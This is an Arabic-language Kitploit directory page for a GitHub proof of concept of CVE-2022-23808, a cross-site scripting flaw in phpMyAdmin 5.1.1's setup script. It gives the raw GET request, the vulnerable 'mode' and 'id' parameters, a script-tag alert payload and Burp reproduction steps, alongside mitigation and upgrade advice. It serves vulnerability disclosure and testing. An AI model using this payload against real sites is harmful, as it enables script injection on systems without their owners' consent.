Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-23808 — phpMyAdmin XSS | Kitploit
أدوات/GitHubGitHub/dipakpanchal05/cve-2022-23808
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالفريق الأحمر
GitHubdipakpanchal05/cve-2022-23808

CVE-2022-23808

phpMyAdmin XSS

عرض المستودع
11423منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال phpMyAdmin

عنوان الاستغلال : phpMyAdmin 5.1.1 - XSS (Cross-site Scripting)
مؤلف الاستغلال : Dipak Panchal (@th3.d1p4k)
الصفحة الرئيسية للبائع : https://www.phpmyadmin.net
رابط البرنامج : https://www.phpmyadmin.net/files/5.1.1/
الإصدارات المتأثرة : إصدارات phpMyAdmin من الفرع 5.1 قبل 5.1.2 متأثرة.
تم الاختبار على : Windows 10 و Linux
CVE : CVE-2022-23808
مرجع : https://www.phpmyadmin.net/security/PMASA-2022-2/

الوصف:

تم اكتشاف سلسلة من نقاط الضعف التي قد تسمح للمهاجم بحقن كود خبيث في جوانب من سكريبت الإعداد، مما قد يسمح بحقن XSS أو HTML.

الطلب:

root@kitploit:~
GET /phpmyadmin/setup/index.php?page=servers&mode=test&id=test  HTTP/1.1      
Host: 127.0.0.1:1234       
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0      
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8      
Accept-Language: en-US,en;q=0.5     
Connection: close   
Cookie: pma_lang=en; phpMyAdmin=fs55xxxxxxx; pma_lang=en; pmaUser-1=xxxxxxxxxxxxxxxxxxxxxxxxxxx; phpMyAdmin=xxxxxxxxxxxxxxx; pmaAuth-1=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx           
Upgrade-Insecure-Requests: 1          
Cache-Control: max-age=0          

المعامل(ات) القابلة للاختراق :

  • mode
  • id

الحمولة :

root@kitploit:~
">'><script>alert(document.domain)</script>

خطوات إعادة الإنتاج :

  1. التقاط الطلب أعلاه في Burp.
  2. استبدال/تغيير حمولة XSS مع المعاملات القابلة للاختراق.
  3. النقر على إرسال وعرض الرد في المتصفح.
  4. ستحصل على نافذة منبثقة!

إثبات المفهوم :

2022-01-26_21h45_23

التخفيف :

تثبيت phpMyAdmin مع ملف الإعداد config.inc.php سيمنع الوصول إلى سكريبت الإعداد، مما يخفف من هذا الهجوم.

الإصلاح :

قم بالترقية إلى phpMyAdmin 5.1.2 أو أحدث أو قم بتطبيق التصحيح.

تنزيل الأداة